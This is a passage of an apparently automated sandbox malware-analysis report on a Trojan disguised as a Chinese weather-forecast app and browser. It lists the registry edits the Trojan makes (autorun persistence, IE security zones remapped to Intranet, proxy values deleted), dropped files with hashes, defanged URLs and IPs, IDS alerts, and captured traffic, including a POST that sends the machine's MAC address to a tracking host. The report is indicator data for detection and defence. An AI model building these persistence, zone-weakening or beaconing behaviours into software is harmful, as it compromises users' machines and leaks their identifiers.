"Common AppData" = "%Documents and Settings%\All Users\Application Data"
"CommonPictures" = "%Documents and Settings%\All Users\Documents\My Pictures"
"CommonMusic" = "%Documents and Settings%\All Users\Documents\My Music"
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\worldweather.exe]
"mac" = "00-0C-29-3B-DF-2F"

"(Default)" = "%Program Files%\worldweather\5.0.0.5002\worldweather.exe"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"My Pictures" = "%Documents and Settings%\%current user%\My Documents\My Pictures"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{fdd9f6f2-7454-11e2-b4cd-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\worldweather.exe]
"collection" = "%Documents and Settings%\%current user%\Favorites"
"menu" = "%Documents and Settings%\%current user%\Start Menu"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Start Menu" = "%Documents and Settings%\%current user%\Start Menu"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "46 00 00 00 41 00 00 00 01 00 00 00 00 00 00 00"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonVideo" = "%Documents and Settings%\All Users\Documents\My Videos"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\worldweather.exe]
"desk" = "%Documents and Settings%\%current user%\Desktop"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "28 C8 58 59 01 0D 26 67 C6 D4 CD 56 D0 F1 31 08"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\worldweather]
"URLInfoAbout" = "http://weather.22pk.cn/"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Programs" = "%Documents and Settings%\All Users\Start Menu\Programs"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\worldweather]
"Publisher" = "大众天气工作室" (GBK; "Dazhong Weather Studio")

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{773a730e-74fb-11e2-b597-000c293bdf2f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"

[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\%Program Files%\worldweather]
"5.0.0.5002/worldWeatherRealTime5002.exe" = "worldWeatherRealTime5002.exe"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{fdd9f6f5-7454-11e2-b4cd-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Favorites" = "%Documents and Settings%\%current user%\Favorites"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\worldweather]
"DisplayVersion" = "5.0.0.5002"
"DisplayName" = "大众天气预报 5.0.0.5002" (GBK; "Dazhong Weather Forecast 5.0.0.5002")

The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

"ProxyBypass" = "1"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan modifies IE security-zone settings so that all URLs are mapped to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

To run automatically each time Windows boots, the Trojan adds the following link to its file under the system registry autorun key:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"worldweather5002" = "%Program Files%\worldweather\5.0.0.5002\worldweather.exe /autorun"

The Trojan deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"

The process greendou.exe:2332 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKCU\Software\Microsoft\Internet Explorer\International\CpMRU]
"Size" = "10"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{fdd9f6f3-7454-11e2-b4cd-806d6172696f}]
"BaseClass" = "Drive"

[HKCR\CLSID\{0002DF01-0000-0000-C000-000000000046}\LocalServer32]
"(Default)" = "%Program Files%\Internet Explorer\IEXPLORE.EXE"

[HKCU\Software\Microsoft\Internet Explorer\International\CpMRU]
"InitHits" = "100"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\MSHist012014052120140522]
"CacheRepair" = "0"
"CachePath" = "%USERPROFILE%\Local Settings\History\History.IE5\MSHist012014052120140522"

[HKCU\Software\Microsoft\Internet Explorer\International]
"W2KLpk" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache]
"@shell32.dll,-12693" = "Favorites"

[HKCU\Software\Microsoft\Internet Explorer\International\CpMRU]
"Enable" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\MSHist012014052120140522]
"CachePrefix" = ":2014052120140522:"
"CacheLimit" = "8192"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKCU\Software\Microsoft\Internet Explorer\International\CpMRU]
"Factor" = "20"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{fdd9f6f2-7454-11e2-b4cd-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\MSHist012014052120140522]
"CacheOptions" = "11"

[HKCU\Software\Microsoft\Internet Explorer\Main\WindowsSearch]
"Version" = "WS not installed"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "46 00 00 00 43 00 00 00 01 00 00 00 00 00 00 00"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "66 FA 27 E4 8E F2 CA 1A E9 7F BA C9 35 C8 42 B9"

[HKCU\Software\Gie]
"update2" = "2"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{773a730e-74fb-11e2-b597-000c293bdf2f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Internet Explorer\Main]
"Disable Script Debugger" = "yes"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{fdd9f6f5-7454-11e2-b4cd-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Favorites" = "%Documents and Settings%\%current user%\Favorites"

The Trojan modifies IE security-zone settings so that all local web nodes without dots that are not assigned to any zone are mapped to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

The Trojan modifies IE security-zone settings so that all web nodes that bypass the proxy are mapped to the Intranet Zone:

"ProxyBypass" = "1"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan modifies IE security-zone settings so that all URLs are mapped to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

The Trojan deletes the following registry key(s):

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\MSHist012013041520130416]
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\MSHist012013040820130415]

The Trojan deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"

[HKLM\System\CurrentControlSet\Services\Tcpip\Performance]
"Error Count"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyOverride"

The process PM10.5002.exe:2384 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "D9 EF DD 9A 1E ED E3 08 5C E7 42 AF 77 7F BA A0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{fdd9f6f3-7454-11e2-b4cd-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{773a730e-74fb-11e2-b597-000c293bdf2f}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{fdd9f6f2-7454-11e2-b4cd-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonMusic" = "%Documents and Settings%\All Users\Documents\My Music"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"My Pictures" = "%Documents and Settings%\%current user%\My Documents\My Pictures"
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{fdd9f6f5-7454-11e2-b4cd-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonVideo" = "%Documents and Settings%\All Users\Documents\My Videos"
"Common Start Menu" = "%Documents and Settings%\All Users\Start Menu"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Start Menu" = "%Documents and Settings%\%current user%\Start Menu"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonPictures" = "%Documents and Settings%\All Users\Documents\My Pictures"

The process worldWeatherRealTime5002.exe:1344 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "2A 55 DA 11 F3 29 B0 38 15 14 D0 31 84 35 EF 8E"

[HKCR\AppID\worldWeatherRTP.EXE]
"AppID" = "{C75ABB58-E428-4F54-A75E-39E1905088A4}"

[HKCR\AppID\{C75ABB58-E428-4F54-A75E-39E1905088A4}]
"LocalService" = "worldWeatherRealTime5002"
"(Default)" = "worldWeatherRTP"

The Trojan deletes the following value(s) in system registry:

[HKCR\AppID\{C75ABB58-E428-4F54-A75E-39E1905088A4}]
"LocalService"

The process %original file name%.exe:1956 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonVideo" = "%Documents and Settings%\All Users\Documents\My Videos"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\绿豆浏览器]
"DisplayName" = "绿豆浏览器 1.0.0.0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
"Desktop" = "%Documents and Settings%\%current user%\Desktop"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
"My Pictures" = "%Documents and Settings%\%current user%\My Documents\My Pictures"
"Programs" = "%Documents and Settings%\%current user%\Start Menu\Programs"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\绿豆浏览器]
"Publisher" = "ico237"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonMusic" = "%Documents and Settings%\All Users\Documents\My Music"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\绿豆浏览器]
"DisplayVersion" = "1.0.0.0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"
"Common Start Menu" = "%Documents and Settings%\All Users\Start Menu"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
"Start Menu" = "%Documents and Settings%\%current user%\Start Menu"
"Personal" = "%Documents and Settings%\%current user%\My Documents"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonPictures" = "%Documents and Settings%\All Users\Documents\My Pictures"

Dropped PE files

MD5 File path
1eca983679d2f2760f15fc79a6a294ca c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\365weatherIns_61.exe
99f345cf51b6c3c317d20a81acb11012 c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsf5.tmp\KillProcDLL.dll
e4ec95271ff1bcebab49bdfed6817a22 c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsf5.tmp\SkinBtn.dll
00a0194c20ee912257df53bfe258ee4a c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsf5.tmp\System.dll
50fdadda3e993688401f6f1108fabdb4 c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsf5.tmp\inetc.dll
a7d710e78711d5ab90e4792763241754 c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsf5.tmp\md5dll.dll
ab73c0c2a23f913eabdc4cb24b75cbad c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsf5.tmp\nsDialogs.dll
480f41c61ef59b1dbde50427b3d095b2 c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsf5.tmp\nsWindows.dll
50fdadda3e993688401f6f1108fabdb4 c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsp2.tmp\Inetc.dll
a7d710e78711d5ab90e4792763241754 c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsp2.tmp\Md5dll.dll
a5f8399a743ab7f9c88c645c35b1ebb5 c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsp2.tmp\NSISdl.dll
c17103ae9072a06da581dec998343fc1 c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsp2.tmp\System.dll
9b54944ce476591d65288b0701a52c46 c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsp2.tmp\nsRandom.dll
0a4fa7a9ba969a805eb0603c7cfe3378 c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsp2.tmp\processwork.dll
76d2faad042161f24b6c9c78de3bd265 c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsp2.tmp\xID.dll
0600be4459db030785c2d61ab8ea4de0 c:\Program Files\greeou\GreenDou.exe
1ec57595ea72f47d328acb5fa13aa6f9 c:\Program Files\worldweather\5.0.0.5002\AQI.5002.exe
af9dc00391e568586f6e045c0d80ec58 c:\Program Files\worldweather\5.0.0.5002\PM10.5002.exe
3ae2ae19da4de10a41f631e0cd59464d c:\Program Files\worldweather\5.0.0.5002\PM25.5002.exe
f41b53208000678976ec71d4574dcfa3 c:\Program Files\worldweather\5.0.0.5002\mfc5002.dll
f22066ce95253bc57a054623a65eda06 c:\Program Files\worldweather\5.0.0.5002\sqlite3.dll
b81124b08acb34b432fae845335bce99 c:\Program Files\worldweather\5.0.0.5002\sqliteApi.dll
2a4c40c30da6bbccf03928dcb998193c c:\Program Files\worldweather\5.0.0.5002\uninst.exe
f9e2d87db3700c704d8e7fffa0ab8985 c:\Program Files\worldweather\5.0.0.5002\worldWeatherRealTime5002.exe
f44c74c844114fa977315265813afb26 c:\Program Files\worldweather\5.0.0.5002\worldWeatherUpdate.5002.exe
7eab31806313acd8429450e72c294442 c:\Program Files\worldweather\5.0.0.5002\worldweather.exe

HOSTS file anomalies

No changes have been detected.

Rootkit activity

No anomalies have been detected.

Propagation

VersionInfo

Company Name: MeinV
Product Name: ?????
Product Version: 1.0.0.0
Legal Copyright: Corporation. All rights reserved.
Legal Trademarks:
Original Filename:
Internal Name:
File Version: 1.0.0.0
File Description: Installer Application
Comments: http://45y.3baidu.org
Language: Language Neutral

PE Sections

Name Virtual Address Virtual Size Raw Size Entropy Section MD5
.text 4096 23628 24064 4.46394 856b32eb77dfd6fb67f21d6543272da5
.rdata 28672 4764 5120 3.4982 dc77f8a1e6985a4361c55642680ddb4f
.data 36864 154712 1024 3.3278 7922d4ce117d7d5b3ac2cffe4b0b5e4f
.ndata 192512 81920 0 0 d41d8cd98f00b204e9800998ecf8427e
.rsrc 274432 343752 344064 4.85958 c1fa34d2f49a5ffc17f1a0f08f5d1597

Dropped from:

Downloaded by:

Similar by SSDeep:

Similar by Lavasoft Polymorphic Checker:

URLs

URL IP
hxxp://lm.beilequ.com/update/365/365weatherIns_61.rar 122.225.100.200
hxxp://sj88.www.web.glb0.ldcache.net/hezi/jm/setup_a7158.rar
hxxp://weather51la.cnzz.alivcd.com/cnzz/weather/5.0.0.5002/tongji/tongji_61.html 122.225.104.211
hxxp://lvdou.300duo.com/ 223.255.145.200
hxxp://lvdou.300duo.com/favicon.ico 223.255.145.200
hxxp://proxy.sogou.com/?22014
hxxp://weather51la.cnzz.alivcd.com/post/ 122.225.104.211
hxxp://weather51la.cnzz.alivcd.com/cnzz/weather/weatherPng/cnzz.html 122.225.104.211
hxxp://img.users.51.la/15909623.asp 117.21.191.223
hxxp://weather51la.cnzz.alivcd.com/cnzz/weather/5.0.0.5002/weatherdata/_61/cnzz.html 122.225.104.211
hxxp://weather51la.cnzz.alivcd.com/cnzz/weather/5.0.0.5002/weatherdata/_61/WeatherContext.xml 122.225.104.211
hxxp://int.dpool.sina.com.cn/iplookup 123.125.29.252
hxxp://int.dpool.sina.com.cn/iplookup/ 123.125.29.252
hxxp://123.sogou.com/?22014 106.120.151.64
hxxp://weather51la.cnzz.uujzy.com/cnzz/weather/weatherPng/cnzz.html 122.225.104.211
hxxp://www.sj88.com/hezi/jm/setup_a7158.rar 202.97.174.68
hxxp://weather51la.cnzz.uujzy.com/cnzz/weather/5.0.0.5002/weatherdata/_61/cnzz.html 122.225.104.211
hxxp://weather51la.cnzz.uujzy.com/cnzz/weather/5.0.0.5002/weatherdata/_61/WeatherContext.xml 122.225.104.211
hxxp://www.xzsky.com/post/ 122.225.104.211
vipimg.51.la 182.236.163.236
www.biso.cc 67.198.240.190
weather.uujzy.com 122.225.203.94


IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)

ET POLICY User-Agent (NSIS_Inetc (Mozilla)) - Sometimes used by hostile installers
ET SHELLCODE Possible TCP x86 JMP to CALL Shellcode Detected
ET DNS DNS Query for Suspicious .com.cn Domain
ET TROJAN Suspicious User-Agent (Session) - Possible Trojan-Clicker
ET POLICY HTTP Request on Unusual Port Possibly Hostile

Traffic

GET /hezi/jm/setup_a7158.rar HTTP/1.0
Host: VVV.sj88.com
User-Agent: NSISDL/1.2 (Mozilla)
Accept: */*




<<< skipped >>>

GET / HTTP/1.1
Accept: */*
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C; .NET4.0E)
Host: lvdou.300duo.com
Connection: Keep-Alive


HTTP/1.1 302 Object moved
Date: Wed, 21 May 2014 16:13:10 GMT
Server: Microsoft-IIS/6.0
Location: hXXp://123.sogou.com/?22014
Content-Length: 148
Content-Type: text/html
Set-Cookie: daohang=1; path=/
Set-Cookie: ASPSESSIONIDCCQCTBQS=FPCOCFACEMEPNNIINJKPLHCL; path=/
Cache-control: private
<head><title>Object moved</title></head>.<b
ody><h1>Object Moved</h1>This object may be found <a
HREF="hXXp://123.sogou.com/?22014">here</a>.</body>...


GET /15909623.asp HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://tongji.uujzy.com/tongji.html?5.0.0.5002_id61_md1_os1
User-Agent: session
Host: img.users.51.la

GET /15909623.asp HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://tongji.uujzy.com/tongji.html?5.0.0.5002_id61_md1_os1
User-Agent: session
Host: img.users.51.la


HTTP/1.1 302 Object moved
Date: Wed, 21 May 2014 16:13:48 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Location: hXXp://vipimg.51.la:82/go.asp?svid=1&id=15909623&style=9&vpage=http://tongji.uujzy.com/tongji.html?5.0.0.5002_id61_md1_os1&828.046.gif
Content-Length: 299
Content-Type: text/html
Cache-control: private
<head><title>Object moved</title></head>.<b
ody><h1>Object Moved</h1>This object may be found <a
HREF="hXXp://vipimg.51.la:82/go.asp?svid=1&id=15909623&style=
9&vpage=http://tongji.uujzy.com/tongji.html?5.0%
2E0.5002_id61_md1_os1&828.046.gif">here</a>.</
body>...


POST /post/ HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: NSIS_Inetc (Mozilla)
Host: VVV.xzsky.com
Content-Length: 137
Connection: Keep-Alive
Cache-Control: no-cache

mac=00-0C-29-3B-DF-2F&soft_id=33&tuiguang_id=C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\365weatherIns_61.exe&yanzheng=f72e066ddb1d94ae63e1d32390e05757
HTTP/1.1 200 OK
Server: nginx/1.4.1
Date: Wed, 21 May 2014 16:13:13 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
X-Powered-By: PHP/5.3.15
0..


GET /cnzz/weather/weatherPng/cnzz.html HTTP/1.1
User-Agent: mfc5002
Host: weather51la.cnzz.uujzy.com
Cache-Control: no-cache


HTTP/1.1 200 OK
Server: nginx/1.4.1
Date: Wed, 21 May 2014 16:13:33 GMT
Content-Type: text/html
Content-Length: 2
Last-Modified: Wed, 18 Dec 2013 02:33:49 GMT
Connection: keep-alive
ETag: "52b1098d-2"
Accept-Ranges: bytes
OK..


GET /update/365/365weatherIns_61.rar HTTP/1.0
Host: lm.beilequ.com
User-Agent: NSISDL/1.2 (Mozilla)
Accept: */*


HTTP/1.1 200 OK
Server: nginx/1.1.19
Date: Wed, 21 May 2014 16:03:08 GMT
Content-Type: application/x-rar-compressed
Content-Length: 1038034
Last-Modified: Fri, 21 Mar 2014 05:24:42 GMT
Connection: close
Accept-Ranges: bytes

<<< skipped >>>

GET /cnzz/weather/5.0.0.5002/weatherdata/_61/cnzz.html HTTP/1.1
User-Agent: mfc5002
Host: weather51la.cnzz.uujzy.com
Cache-Control: no-cache
Cookie: city=101010100


HTTP/1.1 200 OK
Server: nginx/1.4.1
Date: Wed, 21 May 2014 16:13:40 GMT
Content-Type: text/html
Content-Length: 198
Last-Modified: Wed, 16 Apr 2014 09:44:13 GMT
Connection: keep-alive
ETag: "534e50ed-c6"
Accept-Ranges: bytes
a556f5dd20dcbdfb274d34f5c504a160$2d204d39f2faa25896874c01c0135d760$bca
7b8d364fc9c89c96702a19aa47a00$d8099717b5894a1c926de4f6fe36e650$bf60bba
bd09f5e0270f38adbc02d36b0$b982497d26da6f0218296012b54c5ab0
....



GET /cnzz/weather/5.0.0.5002/weatherdata/_61/WeatherContext.xml HTTP/1.1
User-Agent: mfc5002
Host: weather51la.cnzz.uujzy.com
Cache-Control: no-cache
Cookie: city=101010100


HTTP/1.1 200 OK
Server: nginx/1.4.1
Date: Wed, 21 May 2014 16:13:41 GMT
Content-Type: text/xml
Content-Length: 509
Last-Modified: Fri, 21 Mar 2014 04:22:34 GMT
Connection: keep-alive
ETag: "532bbe8a-1fd"
Accept-Ranges: bytes
<html>..<title>........</title> ..<body scroll=no
>..<skin>..<name>skin.xml</name>..<path>htt
p://conf.f.360.cn/status.html</path>..<hash>ffa9975d557f92
25ae0a0eb80212b98f</hash>..<size>0</size>..<type&
gt;0</type>..<cnzz>hXXp://int.dpool.sina.com.cn/iplookup$c
nzz_ID_0</cnzz>..<cfg>hXXp://weather51la.cnzz.uujzy.com/cn
zz/weather/5.0.0.5002/</cfg>..<cfg>hXXp://weather51la.cnzz
.alivcd.com/cnzz/weather/5.0.0.5002/</cfg>..<tqy>AQI.5002.
exe</tqy>..<chx>worldWeatherRealTime5002.exe</chx>..
</skin>..</body>..</html>..


GET /iplookup HTTP/1.1
User-Agent: mfc5002
Host: int.dpool.sina.com.cn
Cache-Control: no-cache


HTTP/1.1 301 Moved Permanently
Date: Wed, 21 May 2014 16:13:47 GMT
Server: Apache
Location: hXXp://int.dpool.sina.com.cn/iplookup/
Cache-Control: max-age=120
Expires: Wed, 21 May 2014 16:15:47 GMT
Content-Length: 246
Connection: close
Content-Type: text/html; charset=iso-8859-1
SINA-LB:aGEuMzguZzEuYngubGIuc2luYW5vZGUuY29t
SINA-TS:OTRjMmRlY2UgMCAwIDAgMyAwCg==
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">.<html>&
lt;head>.<title>301 Moved Permanently</title>.</head
><body>.<h1>Moved Permanently</h1>.<p>The d
ocument has moved <a href="hXXp://int.dpool.sina.com.cn/iplookup/"&
gt;here</a>.</p>.</body></html>...


GET /favicon.ico HTTP/1.1
User-Agent: ...............
Host: lvdou.300duo.com
Connection: Keep-Alive


HTTP/1.1 302 Object moved
Date: Wed, 21 May 2014 16:13:10 GMT
Server: Microsoft-IIS/6.0
Location: hXXp://123.sogou.com/?22014
Content-Length: 148
Content-Type: text/html
Set-Cookie: daohang=1; path=/
Set-Cookie: ASPSESSIONIDCCQCTBQS=GPCOCFACAIEBIMHNEGNIFCFK; path=/
Cache-control: private
<head><title>Object moved</title></head>.<b
ody><h1>Object Moved</h1>This object may be found <a
HREF="hXXp://123.sogou.com/?22014">here</a>.</body>...


GET /?22014 HTTP/1.1
Accept: */*
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C; .NET4.0E)
Host: 123.sogou.com
Connection: Keep-Alive


HTTP/1.1 200 OK
Server: nginx
Date: Wed, 21 May 2014 16:13:05 GMT
Content-Type: text/html; charset=gbk
Transfer-Encoding: chunked
Connection: keep-alive
P3P: CP="NON DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAa IVDa CONa HISa TELa OTPa OUR UNRa IND UNI COM NAV INT DEM CNT PRELOC"
Content-Encoding: gzip

<<< skipped >>>

GET /?22014 HTTP/1.1
User-Agent: ...............
Connection: Keep-Alive
Host: 123.sogou.com


HTTP/1.1 200 OK
Server: nginx
Date: Wed, 21 May 2014 16:13:05 GMT
Content-Type: text/html; charset=gbk
Transfer-Encoding: chunked
Connection: keep-alive
P3P: CP="NON DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAa IVDa CONa HISa TELa OTPa OUR UNRa IND UNI COM NAV INT DEM CNT PRELOC"
Content-Encoding: gzip

<<< skipped >>>

GET /cnzz/weather/5.0.0.5002/tongji/tongji_61.html HTTP/1.1
User-Agent: NSIS_Inetc (Mozilla)
Host: weather51la.cnzz.alivcd.com
Connection: Keep-Alive
Cache-Control: no-cache


HTTP/1.1 200 OK
Server: nginx/1.4.1
Date: Wed, 21 May 2014 16:13:05 GMT
